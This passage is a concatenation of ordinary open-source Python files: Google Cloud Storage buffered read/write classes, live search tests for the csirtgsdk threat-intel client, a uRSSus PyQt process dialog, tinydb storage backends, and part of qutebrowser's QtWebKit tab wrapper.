if self._buffer_future is None:
if size < 0 or size >= self._remaining():
needs = self._remaining()
else:
needs = size
data_list.extend(self._get_segments(self._offset, needs))
self._offset += needs
break
if self._buffer_future:
self._buffer.reset(self._buffer_future.get_result())
self._buffer_future = None
if self._buffer_future is None:
self._request_next_buffer()
return ''.join(data_list)
def _remaining(self):
return self._file_size - self._offset
def _request_next_buffer(self):
"""Request next buffer.
Requires self._offset and self._buffer are in consistent state.
"""
self._buffer_future = None
next_offset = self._offset + self._buffer.remaining()
if next_offset != self._file_size:
self._buffer_future = self._get_segment(next_offset,
self._buffer_size)
def _get_segments(self, start, request_size):
"""Get segments of the file from Google Storage as a list.
A large request is broken into segments to avoid hitting urlfetch
response size limit. Each segment is returned from a separate urlfetch.
Args:
start: start offset to request. Inclusive. Have to be within the
range of the file.
request_size: number of bytes to request.
Returns:
A list of file segments in order
"""
if not request_size:
return []
end = start + request_size
futures = []
while request_size > self._max_request_size:
futures.append(self._get_segment(start, self._max_request_size))
request_size -= self._max_request_size
start += self._max_request_size
if start < end:
futures.append(self._get_segment(start, end - start))
return [fut.get_result() for fut in futures]
@ndb.tasklet
def _get_segment(self, start, request_size, check_response=True):
"""Get a segment of the file from Google Storage.
Args:
start: start offset of the segment. Inclusive. Have to be within the
range of the file.
request_size: number of bytes to request. Have to be small enough
for a single urlfetch request. May go over the logical range of the
file.
check_response: True to check the validity of GCS response automatically
before the future returns. False otherwise. See Yields section.
Yields:
If check_response is True, the segment [start, start + request_size)
of the file.
Otherwise, a tuple. The first element is the unverified file segment.
The second element is a closure that checks response. Caller should
first invoke the closure before consuing the file segment.
Raises:
ValueError: if the file has changed while reading.
"""
end = start + request_size - 1
content_range = '%d-%d' % (start, end)
headers = {'Range': 'bytes=' + content_range}
status, resp_headers, content = yield self._api.get_object_async(
self._path, headers=headers)
def _checker():
errors.check_status(status, [200, 206], self._path, headers,
resp_headers, body=content)
self._check_etag(resp_headers.get('etag'))
if check_response:
_checker()
raise ndb.Return(content)
raise ndb.Return(content, _checker)
def _check_etag(self, etag):
"""Check if etag is the same across requests to GCS.
If self._etag is None, set it. If etag is set, check that the new
etag equals the old one.
In the __init__ method, we fire one HEAD and one GET request using
ndb tasklet. One of them would return first and set the first value.
Args:
etag: etag from a GCS HTTP response. None if etag is not part of the
response header. It could be None for example in the case of GCS
composite file.
Raises:
ValueError: if two etags are not equal.
"""
if etag is None:
return
elif self._etag is None:
self._etag = etag
elif self._etag != etag:
raise ValueError('File on GCS has changed while reading.')
def close(self):
self.closed = True
self._buffer = None
self._buffer_future = None
def __enter__(self):
return self
def __exit__(self, atype, value, traceback):
self.close()
return False
def seek(self, offset, whence=os.SEEK_SET):
"""Set the file's current offset.
Note if the new offset is out of bound, it is adjusted to either 0 or EOF.
Args:
offset: seek offset as number.
whence: seek mode. Supported modes are os.SEEK_SET (absolute seek),
os.SEEK_CUR (seek relative to the current position), and os.SEEK_END
(seek relative to the end, offset should be negative).
Raises:
IOError: When this buffer is closed.
ValueError: When whence is invalid.
"""
self._check_open()
self._buffer.reset()
self._buffer_future = None
if whence == os.SEEK_SET:
self._offset = offset
elif whence == os.SEEK_CUR:
self._offset += offset
elif whence == os.SEEK_END:
self._offset = self._file_size + offset
else:
raise ValueError('Whence mode %s is invalid.' % str(whence))
self._offset = min(self._offset, self._file_size)
self._offset = max(self._offset, 0)
if self._remaining():
self._request_next_buffer()
def tell(self):
"""Tell the file's current offset.
Returns:
current offset in reading this file.
Raises:
IOError: When this buffer is closed.
"""
self._check_open()
return self._offset
def _check_open(self):
if self.closed:
raise IOError('Buffer is closed.')
def seekable(self):
return True
def readable(self):
return True
def writable(self):
return False
class _Buffer(object):
"""In memory buffer."""
def __init__(self):
self.reset()
def reset(self, content='', offset=0):
self._buffer = content
self._offset = offset
def read(self, size=-1):
"""Returns bytes from self._buffer and update related offsets.
Args:
size: number of bytes to read starting from current offset.
Read the entire buffer if negative.
Returns:
Requested bytes from buffer.
"""
if size < 0:
offset = len(self._buffer)
else:
offset = self._offset + size
return self.read_to_offset(offset)
def read_to_offset(self, offset):
"""Returns bytes from self._buffer and update related offsets.
Args:
offset: read from current offset to this offset, exclusive.
Returns:
Requested bytes from buffer.
"""
assert offset >= self._offset
result = self._buffer[self._offset: offset]
self._offset += len(result)
return result
def remaining(self):
return len(self._buffer) - self._offset
def find_newline(self, size=-1):
"""Search for newline char in buffer starting from current offset.
Args:
size: number of bytes to search. -1 means all.
Returns:
offset of newline char in buffer. -1 if doesn't exist.
"""
if size < 0:
return self._buffer.find('\n', self._offset)
return self._buffer.find('\n', self._offset, self._offset + size)
class StreamingBuffer(object):
"""A class for creating large objects using the 'resumable' API.
The API is a subset of the Python writable stream API sufficient to
support writing zip files using the zipfile module.
The exact sequence of calls and use of headers is documented at
https://developers.google.com/storage/docs/developer-guide#unknownresumables
"""
_blocksize = 256 * 1024
_flushsize = 8 * _blocksize
_maxrequestsize = 9 * 4 * _blocksize
def __init__(self,
api,
path,
content_type=None,
gcs_headers=None):
"""Constructor.
Args:
api: A StorageApi instance.
path: Quoted/escaped path to the object, e.g. /mybucket/myfile
content_type: Optional content-type; Default value is
delegate to Google Cloud Storage.
gcs_headers: additional gs headers as a str->str dict, e.g
{'x-goog-acl': 'private', 'x-goog-meta-foo': 'foo'}.
Raises:
IOError: When this location can not be found.
"""
assert self._maxrequestsize > self._blocksize
assert self._maxrequestsize % self._blocksize == 0
assert self._maxrequestsize >= self._flushsize
self._api = api
self._path = path
self.name = api_utils._unquote_filename(path)
self.closed = False
self._buffer = collections.deque()
self._buffered = 0
self._written = 0
self._offset = 0
headers = {'x-goog-resumable': 'start'}
if content_type:
headers['content-type'] = content_type
if gcs_headers:
headers.update(gcs_headers)
status, resp_headers, content = self._api.post_object(path, headers=headers)
errors.check_status(status, [201], path, headers, resp_headers,
body=content)
loc = resp_headers.get('location')
if not loc:
raise IOError('No location header found in 201 response')
parsed = urlparse.urlparse(loc)
self._path_with_token = '%s?%s' % (self._path, parsed.query)
def __getstate__(self):
"""Store state as part of serialization/pickling.
The contents of the write buffer are stored. Writes to the underlying
storage are required to be on block boundaries (_blocksize) except for the
last write. In the worst case the pickled version of this object may be
slightly larger than the blocksize.
Returns:
A dictionary with the state of this object
"""
return {'api': self._api,
'path': self._path,
'path_token': self._path_with_token,
'buffer': self._buffer,
'buffered': self._buffered,
'written': self._written,
'offset': self._offset,
'closed': self.closed}
def __setstate__(self, state):
"""Restore state as part of deserialization/unpickling.
Args:
state: the dictionary from a __getstate__ call
"""
self._api = state['api']
self._path_with_token = state['path_token']
self._buffer = state['buffer']
self._buffered = state['buffered']
self._written = state['written']
self._offset = state['offset']
self.closed = state['closed']
self._path = state['path']
self.name = api_utils._unquote_filename(self._path)
def write(self, data):
"""Write some bytes.
Args:
data: data to write. str.
Raises:
TypeError: if data is not of type str.
"""
self._check_open()
if not isinstance(data, str):
raise TypeError('Expected str but got %s.' % type(data))
if not data:
return
self._buffer.append(data)
self._buffered += len(data)
self._offset += len(data)
if self._buffered >= self._flushsize:
self._flush()
def flush(self):
"""Flush as much as possible to GCS.
GCS *requires* that all writes except for the final one align on
256KB boundaries. So the internal buffer may still have < 256KB bytes left
after flush.
"""
self._check_open()
self._flush(finish=False)
def tell(self):
"""Return the total number of bytes passed to write() so far.
(There is no seek() method.)
"""
return self._offset
def close(self):
"""Flush the buffer and finalize the file.
When this returns the new file is available for reading.
"""
if not self.closed:
self.closed = True
self._flush(finish=True)
self._buffer = None
def __enter__(self):
return self
def __exit__(self, atype, value, traceback):
self.close()
return False
def _flush(self, finish=False):
"""Internal API to flush.
Buffer is flushed to GCS only when the total amount of buffered data is at
least self._blocksize, or to flush the final (incomplete) block of
the file with finish=True.
"""
while ((finish and self._buffered >= 0) or
(not finish and self._buffered >= self._blocksize)):
tmp_buffer = []
tmp_buffer_len = 0
excess = 0
while self._buffer:
buf = self._buffer.popleft()
size = len(buf)
self._buffered -= size
tmp_buffer.append(buf)
tmp_buffer_len += size
if tmp_buffer_len >= self._maxrequestsize:
excess = tmp_buffer_len - self._maxrequestsize
break
if not finish and (
tmp_buffer_len % self._blocksize + self._buffered <
self._blocksize):
excess = tmp_buffer_len % self._blocksize
break
if excess:
over = tmp_buffer.pop()
size = len(over)
assert size >= excess
tmp_buffer_len -= size
head, tail = over[:-excess], over[-excess:]
self._buffer.appendleft(tail)
self._buffered += len(tail)
if head:
tmp_buffer.append(head)
tmp_buffer_len += len(head)
data = ''.join(tmp_buffer)
file_len = '*'
if finish and not self._buffered:
file_len = self._written + len(data)
self._send_data(data, self._written, file_len)
self._written += len(data)
if file_len != '*':
break
def _send_data(self, data, start_offset, file_len):
"""Send the block to the storage service.
This is a utility method that does not modify self.
Args:
data: data to send in str.
start_offset: start offset of the data in relation to the file.
file_len: an int if this is the last data to append to the file.
Otherwise '*'.
"""
headers = {}
end_offset = start_offset + len(data) - 1
if data:
headers['content-range'] = ('bytes %d-%d/%s' %
(start_offset, end_offset, file_len))
else:
headers['content-range'] = ('bytes */%s' % file_len)
status, response_headers, content = self._api.put_object(
self._path_with_token, payload=data, headers=headers)
if file_len == '*':
expected = 308
else:
expected = 200
errors.check_status(status, [expected], self._path, headers,
response_headers, content,
{'upload_path': self._path_with_token})
def _get_offset_from_gcs(self):
"""Get the last offset that has been written to GCS.
This is a utility method that does not modify self.
Returns:
an int of the last offset written to GCS by this upload, inclusive.
-1 means nothing has been written.
"""
headers = {'content-range': 'bytes */*'}
status, response_headers, content = self._api.put_object(
self._path_with_token, headers=headers)
errors.check_status(status, [308], self._path, headers,
response_headers, content,
{'upload_path': self._path_with_token})
val = response_headers.get('range')
if val is None:
return -1
_, offset = val.rsplit('-', 1)
return int(offset)
def _force_close(self, file_length=None):
"""Close this buffer on file_length.
Finalize this upload immediately on file_length.
Contents that are still in memory will not be uploaded.
This is a utility method that does not modify self.
Args:
file_length: file length. Must match what has been uploaded. If None,
it will be queried from GCS.
"""
if file_length is None:
file_length = self._get_offset_from_gcs() + 1
self._send_data('', 0, file_length)
def _check_open(self):
if self.closed:
raise IOError('Buffer is closed.')
def seekable(self):
return False
def readable(self):
return False
def writable(self):
return True
|
apache-2.0
|
csirtgadgets/py-csirtgsdk
|
test/test_search_live.py
|
3
|
5086
|
import pytest
import os
from time import sleep
from csirtgsdk.indicator import Indicator
from csirtgsdk.feed import Feed
from csirtgsdk.client.http import HTTP as Client
from csirtgsdk.search import Search
CI_BUILD = os.environ.get('CI_BUILD', False)
TOKEN = os.environ.get('CSIRTG_TOKEN', None)
USER = os.environ.get('CSIRTG_USER', 'wes')
REMOTE = os.environ.get('CSIRTG_REMOTE', 'https://csirtg.io/api')
FEED = os.environ.get('CSIRTG_TEST_FEED', 'ci_search_test')
liveonly = pytest.mark.skipif(CI_BUILD is False, reason="CI_BUILD env var not set")
@pytest.fixture
def client():
return Client(
token=TOKEN,
remote=REMOTE
)
@liveonly
def test_indicator_search_fqdn(client):
sleep(3)
INDICATOR = 'example123123123.com'
# create feed and test created feed
f = Feed(client).new(USER, FEED, description='build search test feed')
assert f['updated_at']
# create test and submit test indicator
i = Indicator(client, {
'user': USER,
'feed': FEED,
'indicator': INDICATOR,
'comment': 'this is a test comment'
})
r = i.submit()
# test creating the indicator
assert r['indicator'] == INDICATOR
assert r['itype'] == 'fqdn'
assert r['created_at']
# search for indicator
s = Search(client)
r = s.search(INDICATOR, 10)
for record in r:
if record['feed'] == 'live-test-feed':
assert record['indicator'] == INDICATOR
# delete test feed
f = Feed(client).remove(USER, FEED)
assert f == 200
@liveonly
def test_indicator_search_ipv4(client):
sleep(3)
INDICATOR = '1.1.1.1'
# create feed and test created feed
f = Feed(client).new(USER, FEED, description='build search test feed')
assert f['created_at']
# create test and submit test indicator
i = Indicator(client, {
'user': USER,
'feed': FEED,
'indicator': INDICATOR,
'comment': 'this is a test comment'
})
r = i.submit()
# test creating the indicator
assert r['indicator'] == INDICATOR
assert r['itype'] == 'ipv4'
assert r['created_at']
# search for indicator
s = Search(client)
r = s.search(INDICATOR, 10)
for record in r:
if record['feed'] == 'live-test-feed':
assert record['indicator'] == INDICATOR
# delete test feed
f = Feed(client).remove(USER, FEED)
assert f == 200
@liveonly
def test_indicator_search_ipv6(client):
sleep(3)
INDICATOR = '2001:4860:4860::8888'
# create feed and test created feed
f = Feed(client).new(USER, FEED, description='build search test feed')
assert f['created_at']
# create test and submit test indicator
i = Indicator(client, {
'user': USER,
'feed': FEED,
'indicator': INDICATOR,
'comment': 'this is a test comment'
})
r = i.submit()
# test creating the indicator
assert r['indicator'] == INDICATOR
assert r['itype'] == 'ipv6'
assert r['created_at']
# search for indicator
s = Search(client)
r = s.search(INDICATOR, 10)
for record in r:
if record['feed'] == 'live-test-feed':
assert record['indicator'] == INDICATOR
# delete test feed
f = Feed(client).remove(USER, FEED)
assert f == 200
@liveonly
def test_indicator_search_email(client):
sleep(3)
INDICATOR = '[email protected]'
# create feed and test created feed
f = Feed(client).new(USER, FEED, description='build search test feed')
assert f['created_at']
# create test and submit test indicator
i = Indicator(client, {
'user': USER,
'feed': FEED,
'indicator': INDICATOR,
'comment': 'this is a test comment'
})
r = i.submit()
# test creating the indicator
assert r['indicator'] == INDICATOR
assert r['itype'] == 'email'
assert r['created_at']
# search for indicator
s = Search(client)
r = s.search(INDICATOR, 10)
for record in r:
if record['feed'] == 'live-test-feed':
assert record['indicator'] == INDICATOR
# delete test feed
f = Feed(client).remove(USER, FEED)
assert f == 200
@liveonly
def test_indicator_search_url(client):
sleep(3)
INDICATOR = 'http://www.example.com/test/index.html'
# create feed and test created feed
f = Feed(client).new(USER, FEED, description='build search test feed')
assert f['created_at']
# create test and submit test indicator
i = Indicator(client, {
'user': USER,
'feed': FEED,
'indicator': INDICATOR,
'comment': 'this is a test comment'
})
r = i.submit()
# test creating the indicator
assert r['indicator'] == INDICATOR
assert r['itype'] == 'uri'
assert r['created_at']
# search for indicator
s = Search(client)
r = s.search(INDICATOR, 10)
for record in r:
if record['feed'] == 'live-test-feed':
assert record['indicator'] == INDICATOR
# delete test feed
f = Feed(client).remove(USER, FEED)
assert f == 200
|
lgpl-3.0
|
Alwnikrotikz/urssus
|
urssus/processdialog.py
|
4
|
2232
|
# -*- coding: utf-8 -*-
# uRSSus, a multiplatform GUI news agregator
# Copyright (C) 2008 Roberto Alsina
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# version 2 as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
from PyQt4 import QtGui, QtCore
import multiprocessing
from ui.Ui_runprocess import Ui_Dialog as UI_ProcessDialog
class ProcessDialog(QtGui.QDialog):
def __init__(self, parent, callable, args):
QtGui.QDialog.__init__(self, parent)
# Set up the UI from designer
self.ui=UI_ProcessDialog()
self.ui.setupUi(self)
self.output=multiprocessing.Queue()
self.callable=callable
self.args=args+[self.output]
self.timer=QtCore.QTimer(self)
QtCore.QObject.connect(self.timer, QtCore.SIGNAL("timeout()"), self.showOutput)
self.proc=None
def exec_(self):
self.show()
self.start()
return QtGui.QDialog.exec_(self)
def start(self):
self.proc=multiprocessing.Process(target=self.callable, args=self.args)
self.proc.start()
self.showOutput()
def reject(self):
if self.proc and self.proc.is_alive():
self.proc.terminate()
return QtGui.QDialog.reject(self)
def showOutput(self):
while not self.output.empty():
[code, data]=self.output.get()
if code==0: # Regular output
self.ui.output.append(data+'<br>')
elif code==1:
self.ui.output.append('<b>'+data+'<b><br>')
elif code==2: # Really bad
QtGui.QMessageBox.critical(self, 'Error - uRSSus', data )
self.reject()
elif code==100: # The result data
self.result=data
self.accept()
if self.proc.is_alive():
self.timer.setInterval(500)
self.timer.start()
|
lgpl-2.1
|
jorgeslima/files_copier
|
dependencies/tinydb/tinydb/storages.py
|
2
|
2980
|
"""
Contains the :class:`base class <tinydb.storages.Storage>` for storages and
implementations.
"""
from abc import ABCMeta, abstractmethod
import os
from .utils import with_metaclass
try:
import ujson as json
except ImportError:
import json
def touch(fname, create_dirs):
if create_dirs:
base_dir = os.path.dirname(fname)
if not os.path.exists(base_dir):
os.makedirs(base_dir)
with open(fname, 'a'):
os.utime(fname, None)
class Storage(with_metaclass(ABCMeta, object)):
"""
The abstract base class for all Storages.
A Storage (de)serializes the current state of the database and stores it in
some place (memory, file on disk, ...).
"""
# Using ABCMeta as metaclass allows instantiating only storages that have
# implemented read and write
@abstractmethod
def read(self):
"""
Read the last stored state.
Any kind of deserialization should go here.
Return ``None`` here to indicate that the storage is empty.
:rtype: dict
"""
raise NotImplementedError('To be overridden!')
@abstractmethod
def write(self, data):
"""
Write the current state of the database to the storage.
Any kind of serialization should go here.
:param data: The current state of the database.
:type data: dict
"""
raise NotImplementedError('To be overridden!')
def close(self):
"""
Optional: Close open file handles, etc.
"""
pass
class JSONStorage(Storage):
"""
Store the data in a JSON file.
"""
def __init__(self, path, create_dirs=False, **kwargs):
"""
Create a new instance.
Also creates the storage file, if it doesn't exist.
:param path: Where to store the JSON data.
:type path: str
"""
super(JSONStorage, self).__init__()
touch(path, create_dirs=create_dirs) # Create file if not exists
self.kwargs = kwargs
self._handle = open(path, 'r+')
def close(self):
self._handle.close()
def read(self):
# Get the file size
self._handle.seek(0, os.SEEK_END)
size = self._handle.tell()
if not size:
# File is empty
return None
else:
self._handle.seek(0)
return json.load(self._handle)
def write(self, data):
self._handle.seek(0)
serialized = json.dumps(data, **self.kwargs)
self._handle.write(serialized)
self._handle.flush()
self._handle.truncate()
class MemoryStorage(Storage):
"""
Store the data as JSON in memory.
"""
def __init__(self):
"""
Create a new instance.
"""
super(MemoryStorage, self).__init__()
self.memory = None
def read(self):
return self.memory
def write(self, data):
self.memory = data
|
mit
|
lahwaacz/qutebrowser
|
qutebrowser/browser/webkit/webkittab.py
|
1
|
27974
|
# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2016-2017 Florian Bruhin (The Compiler) <[email protected]>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""Wrapper over our (QtWebKit) WebView."""
import sys
import functools
import xml.etree.ElementTree
import sip
from PyQt5.QtCore import (pyqtSlot, Qt, QEvent, QUrl, QPoint, QTimer, QSizeF,
QSize)
from PyQt5.QtGui import QKeyEvent
from PyQt5.QtWidgets import QApplication
from PyQt5.QtWebKitWidgets import QWebPage, QWebFrame
from PyQt5.QtWebKit import QWebSettings
from PyQt5.QtPrintSupport import QPrinter
from qutebrowser.browser import browsertab
from qutebrowser.browser.network import proxy
from qutebrowser.browser.webkit import webview, tabhistory, webkitelem
from qutebrowser.browser.webkit.network import webkitqutescheme
from qutebrowser.utils import qtutils, objreg, usertypes, utils, log, debug
def init():
"""Initialize QtWebKit-specific modules."""
qapp = QApplication.instance()
if not qtutils.version_check('5.8'):
# Otherwise we initialize it globally in app.py
log.init.debug("Initializing proxy...")
proxy.init()
log.init.debug("Initializing js-bridge...")
js_bridge = webkitqutescheme.JSBridge(qapp)
objreg.register('js-bridge', js_bridge)
class WebKitAction(browsertab.AbstractAction):
"""QtWebKit implementations related to web actions."""
action_class = QWebPage
action_base = QWebPage.WebAction
def exit_fullscreen(self):
raise browsertab.UnsupportedOperationError
def save_page(self):
"""Save the current page."""
raise browsertab.UnsupportedOperationError
class WebKitPrinting(browsertab.AbstractPrinting):
"""QtWebKit implementations related to printing."""
def _do_check(self):
if not qtutils.check_print_compat():
# WORKAROUND (remove this when we bump the requirements to 5.3.0)
raise browsertab.WebTabError(
"Printing on Qt < 5.3.0 on Windows is broken, please upgrade!")
def check_pdf_support(self):
self._do_check()
def check_printer_support(self):
self._do_check()
def check_preview_support(self):
self._do_check()
def to_pdf(self, filename):
printer = QPrinter()
printer.setOutputFileName(filename)
self.to_printer(printer)
def to_printer(self, printer, callback=None):
self._widget.print(printer)
# Can't find out whether there was an error...
if callback is not None:
callback(True)
class WebKitSearch(browsertab.AbstractSearch):
"""QtWebKit implementations related to searching on the page."""
def __init__(self, parent=None):
super().__init__(parent)
self._flags = QWebPage.FindFlags(0)
def _call_cb(self, callback, found, text, flags, caller):
"""Call the given callback if it's non-None.
Delays the call via a QTimer so the website is re-rendered in between.
Args:
callback: What to call
found: If the text was found
text: The text searched for
flags: The flags searched with
caller: Name of the caller.
"""
found_text = 'found' if found else "didn't find"
# Removing FindWrapsAroundDocument to get the same logging as with
# QtWebEngine
debug_flags = debug.qflags_key(
QWebPage, flags & ~QWebPage.FindWrapsAroundDocument,
klass=QWebPage.FindFlag)
if debug_flags != '0x0000':
flag_text = 'with flags {}'.format(debug_flags)
else:
flag_text = ''
log.webview.debug(' '.join([caller, found_text, text, flag_text])
.strip())
if callback is not None:
QTimer.singleShot(0, functools.partial(callback, found))
def clear(self):
self.search_displayed = False
# We first clear the marked text, then the highlights
self._widget.findText('')
self._widget.findText('', QWebPage.HighlightAllOccurrences)
def search(self, text, *, ignore_case=False, reverse=False,
result_cb=None):
self.search_displayed = True
flags = QWebPage.FindWrapsAroundDocument
if ignore_case == 'smart':
if not text.islower():
flags |= QWebPage.FindCaseSensitively
elif not ignore_case:
flags |= QWebPage.FindCaseSensitively
if reverse:
flags |= QWebPage.FindBackward
# We actually search *twice* - once to highlight everything, then again
# to get a mark so we can navigate.
found = self._widget.findText(text, flags)
self._widget.findText(text, flags | QWebPage.HighlightAllOccurrences)
self.text = text
self._flags = flags
self._call_cb(result_cb, found, text, flags, 'search')
def next_result(self, *, result_cb=None):
self.search_displayed = True
found = self._widget.findText(self.text, self._flags)
self._call_cb(result_cb, found, self.text, self._flags, 'next_result')
def prev_result(self, *, result_cb=None):
self.search_displayed = True
# The int() here makes sure we get a copy of the flags.
flags = QWebPage.FindFlags(int(self._flags))
if flags & QWebPage.FindBackward:
flags &= ~QWebPage.FindBackward
else:
flags |= QWebPage.FindBackward
found = self._widget.findText(self.text, flags)
self._call_cb(result_cb, found, self.text, flags, 'prev_result')
class WebKitCaret(browsertab.AbstractCaret):
"""QtWebKit implementations related to moving the cursor/selection."""
@pyqtSlot(usertypes.KeyMode)
def _on_mode_entered(self, mode):
if mode != usertypes.KeyMode.caret:
return
settings = self._widget.settings()
settings.setAttribute(QWebSettings.CaretBrowsingEnabled, True)
self.selection_enabled = bool(self.selection())
if self._widget.isVisible():
# Sometimes the caret isn't immediately visible, but unfocusing
# and refocusing it fixes that.
self._widget.clearFocus()
self._widget.setFocus(Qt.OtherFocusReason)
# Move the caret to the first element in the viewport if there
# isn't any text which is already selected.
#
# Note: We can't use hasSelection() here, as that's always
# true in caret mode.
if not self.selection():
self._widget.page().currentFrame().evaluateJavaScript(
utils.read_file('javascript/position_caret.js'))
@pyqtSlot()
def _on_mode_left(self):
settings = self._widget.settings()
if settings.testAttribute(QWebSettings.CaretBrowsingEnabled):
if self.selection_enabled and self._widget.hasSelection():
# Remove selection if it exists
self._widget.triggerPageAction(QWebPage.MoveToNextChar)
settings.setAttribute(QWebSettings.CaretBrowsingEnabled, False)
self.selection_enabled = False
def move_to_next_line(self, count=1):
if not self.selection_enabled:
act = QWebPage.MoveToNextLine
else:
act = QWebPage.SelectNextLine
for _ in range(count):
self._widget.triggerPageAction(act)
def move_to_prev_line(self, count=1):
if not self.selection_enabled:
act = QWebPage.MoveToPreviousLine
else:
act = QWebPage.SelectPreviousLine
for _ in range(count):
self._widget.triggerPageAction(act)
def move_to_next_char(self, count=1):
if not self.selection_enabled:
act = QWebPage.MoveToNextChar
else:
act = QWebPage.SelectNextChar
for _ in range(count):
self._widget.triggerPageAction(act)
def move_to_prev_char(self, count=1):
if not self.selection_enabled:
act = QWebPage.MoveToPreviousChar
else:
act = QWebPage.SelectPreviousChar
for _ in range(count):
self._widget.triggerPageAction(act)
def move_to_end_of_word(self, count=1):
if not self.selection_enabled:
act = [QWebPage.MoveToNextWord]
if sys.platform == 'win32': # pragma: no cover
act.append(QWebPage.MoveToPreviousChar)
else:
act = [QWebPage.SelectNextWord]
if sys.platform == 'win32': # pragma: no cover
act.append(QWebPage.SelectPreviousChar)
for _ in range(count):
for a in act:
self._widget.triggerPageAction(a)
def move_to_next_word(self, count=1):
if not self.selection_enabled:
act = [QWebPage.MoveToNextWord]
if sys.platform != 'win32': # pragma: no branch
act.append(QWebPage.MoveToNextChar)
else:
act = [QWebPage.SelectNextWord]
if sys.platform != 'win32': # pragma: no branch
act.append(QWebPage.SelectNextChar)
for _ in range(count):
for a in act:
self._widget.triggerPageAction(a)
def move_to_prev_word(self, count=1):
if not self.selection_enabled:
act = QWebPage.MoveToPreviousWord
else:
act = QWebPage.SelectPreviousWord
for _ in range(count):
self._widget.triggerPageAction(act)
def move_to_start_of_line(self):
if not self.selection_enabled:
act = QWebPage.MoveToStartOfLine
else:
act = QWebPage.SelectStartOfLine
self._widget.triggerPageAction(act)
def move_to_end_of_line(self):
if not self.selection_enabled:
act = QWebPage.MoveToEndOfLine
else:
act = QWebPage.SelectEndOfLine
self._widget.triggerPageAction(act)
def move_to_start_of_next_block(self, count=1):
if not self.selection_enabled:
act = [QWebPage.MoveToNextLine,
QWebPage.MoveToStartOfBlock]
else:
act = [QWebPage.SelectNextLine,
QWebPage.SelectStartOfBlock]
for _ in range(count):
for a in act:
self._widget.triggerPageAction(a)
def move_to_start_of_prev_block(self, count=1):
if not self.selection_enabled:
act = [QWebPage.MoveToPreviousLine,
QWebPage.MoveToStartOfBlock]
else:
act = [QWebPage.SelectPreviousLine,
QWebPage.SelectStartOfBlock]
for _ in range(count):
for a in act:
self._widget.triggerPageAction(a)
def move_to_end_of_next_block(self, count=1):
if not self.selection_enabled:
act = [QWebPage.MoveToNextLine,
QWebPage.MoveToEndOfBlock]
else:
act = [QWebPage.SelectNextLine,
QWebPage.SelectEndOfBlock]
for _ in range(count):
for a in act:
self._widget.triggerPageAction(a)
def move_to_end_of_prev_block(self, count=1):
if not self.selection_enabled:
act = [QWebPage.MoveToPreviousLine, QWebPage.MoveToEndOfBlock]
else:
act = [QWebPage.SelectPreviousLine, QWebPage.SelectEndOfBlock]
for _ in range(count):
for a in act:
self._widget.triggerPageAction(a)
def move_to_start_of_document(self):
if not self.selection_enabled:
act = QWebPage.MoveToStartOfDocument
else:
act = QWebPage.SelectStartOfDocument
self._widget.triggerPageAction(act)
def move_to_end_of_document(self):
if not self.selection_enabled:
act = QWebPage.MoveToEndOfDocument
else:
act = QWebPage.SelectEndOfDocument
self._widget.triggerPageAction(act)
def toggle_selection(self):
self.selection_enabled = not self.selection_enabled
mainwindow = objreg.get('main-window', scope='window',
window=self._win_id)
mainwindow.status.set_mode_active(usertypes.KeyMode.caret, True)
def drop_selection(self):
self._widget.triggerPageAction(QWebPage.MoveToNextChar)
def has_selection(self):
return self._widget.hasSelection()
def selection(self, html=False):
if html:
return self._widget.selectedHtml()
return self._widget.selectedText()
def follow_selected(self, *, tab=False):
if not self.has_selection():
return
if QWebSettings.globalSettings().testAttribute(
QWebSettings.JavascriptEnabled):
if tab:
self._tab.data.override_target = usertypes.ClickTarget.tab
self._tab.run_js_async(
'window.getSelection().anchorNode.parentNode.click()')
else:
selection = self.selection(html=True)
try:
selected_element = xml.etree.ElementTree.fromstring(
'<html>{}</html>'.format(selection)).find('a')
except xml.etree.ElementTree.ParseError:
raise browsertab.WebTabError('Could not parse selected '
'element!')
if selected_element is not None:
try:
url = selected_element.attrib['href']
except KeyError:
raise browsertab.WebTabError('Anchor element without '
'href!')
url = self._tab.url().resolved(QUrl(url))
if tab:
self._tab.new_tab_requested.emit(url)
else:
self._tab.openurl(url)
class WebKitZoom(browsertab.AbstractZoom):
"""QtWebKit implementations related to zooming."""
def _set_factor_internal(self, factor):
self._widget.setZoomFactor(factor)
def factor(self):
return self._widget.zoomFactor()
class WebKitScroller(browsertab.AbstractScroller):
"""QtWebKit implementations related to scrolling."""
# FIXME:qtwebengine When to use the main frame, when the current one?
def pos_px(self):
return self._widget.page().mainFrame().scrollPosition()
def pos_perc(self):
return self._widget.scroll_pos
def to_point(self, point):
self._widget.page().mainFrame().setScrollPosition(point)
def delta(self, x=0, y=0):
qtutils.check_overflow(x, 'int')
qtutils.check_overflow(y, 'int')
self._widget.page().mainFrame().scroll(x, y)
def delta_page(self, x=0.0, y=0.0):
if y.is_integer():
y = int(y)
if y == 0:
pass
elif y < 0:
self.page_up(count=-y)
elif y > 0:
self.page_down(count=y)
y = 0
if x == 0 and y == 0:
return
size = self._widget.page().mainFrame().geometry()
self.delta(x * size.width(), y * size.height())
def to_perc(self, x=None, y=None):
if x is None and y == 0:
self.top()
elif x is None and y == 100:
self.bottom()
else:
for val, orientation in [(x, Qt.Horizontal), (y, Qt.Vertical)]:
if val is not None:
val = qtutils.check_overflow(val, 'int', fatal=False)
frame = self._widget.page().mainFrame()
m = frame.scrollBarMaximum(orientation)
if m == 0:
continue
frame.setScrollBarValue(orientation, int(m * val / 100))
def _key_press(self, key, count=1, getter_name=None, direction=None):
frame = self._widget.page().mainFrame()
getter = None if getter_name is None else getattr(frame, getter_name)
# FIXME:qtwebengine needed?
